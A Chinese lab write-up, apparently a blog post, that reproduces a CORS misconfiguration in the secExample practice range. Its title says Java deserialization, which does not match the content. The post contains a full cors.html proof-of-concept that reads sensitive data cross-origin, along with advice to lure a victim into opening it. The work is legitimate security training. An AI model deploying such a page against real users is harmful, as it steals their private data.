当前位置: 首页 > news >正文

secExample靶场之java反序列化漏洞复现

我是使用kali虚拟机搭建的靶场,具体搭建步骤可以看我之前的博客内容。

访问靶机地址,打开java反序列化的

点进去后是如图的页面,随便输入一信息。

可以看到敏感信息直接显示在了页面上。

访问192.168.189.141:8080/cors1,可以看到敏感信息直接显示到了页面上。

抓包查看到有cors1漏洞

将以下代码保存为一个cors.html文件,诱惑受害者点击

<html><head><script type="text/javascript">// 当前窗口加载完毕,执行cors函数window.onload = function cors() {// 初始化一个xhttp变量var xhttp = new XMLHttpRequest();xhttp.onreadystatechange = function () {if (this.readyState == 4 && this.status == 200) {document.getElementById("demo").innerHTML = alert(this.responseText);}};xhttp.open("GET", "http://192.168.189.141:8080/cors1", true); // 只需要修改存在cors的url即可xhttp.withCredentials = false;xhttp.send();};</script></head>
<body><textarea id="demo"></textarea>
</body>
</html>

利用web服务器

将脚本放在web服务器上,将url发给受害者。但是没有受害者,我们自己模拟一下受害者访问url地址172.16.1.65/cors.html

http://www.lryc.cn/news/412400.html

相关文章:

  • 解决升级Linux内核后,open files设置无效的问题。
  • 关于防范勒索病毒Play新变种的风险提示
  • 一款.NET开源、跨平台的DASH/HLS/MSS下载工具
  • MATLAB学习日志DAY21
  • Spingboot请求tcp 方式
  • leetcode刷题日记-括号生成
  • 小程序按钮分享
  • 多模态多智能体,在实现系统2(深思熟虑)方面的探索
  • 【CAN通讯系列8】如何准确接收数据?
  • RabbitMQ知识总结(基本概念)
  • Prel语言入门学习:一篇全面的指南
  • 在云服务器上自动化部署项目,jenkins和gitee
  • python 参数输入
  • Spring面试篇章——Spring基本概述
  • 股票预测模型中注意力多层Attention RNN LSTM 的应用
  • C语言 | Leetcode C语言题解之第313题超级丑数
  • PHP健身微信小程序系统源码
  • 树组件 el-tree 数据回显
  • 54、PHP 实现希尔排序
  • linux 虚拟机解压arm-linux-gcc-4.6.4-arm-x86_64.tar.bz2并arm-linux-gcc
  • 泛化的最近点迭代法(Generalized-ICP)
  • Java | Leetcode Java题解之第313题超级丑数
  • 单细胞数据整合-去除批次效应harmony和CCA (学习)
  • MuRF代码阅读
  • pycharm无法导入pyside2模块;“ModuleNotFoundError: No module named ‘PySide2“
  • c语言指针中“数组名的理解”以及“一维数组传参”的本质
  • 计算机毕业设计Python+Flask微博舆情分析 微博情感分析 微博爬虫 微博大数据 舆情监控系统 大数据毕业设计 NLP文本分类 机器学习 深度学习 AI
  • KubeBlocks v0.9 解读|最高可管理 10K 实例的 InstanceSet 是什么?
  • ZW3D二次开发_菜单_禁用/启用表单按钮
  • windows子系统wsl完成本地化设置locale,LC_ALL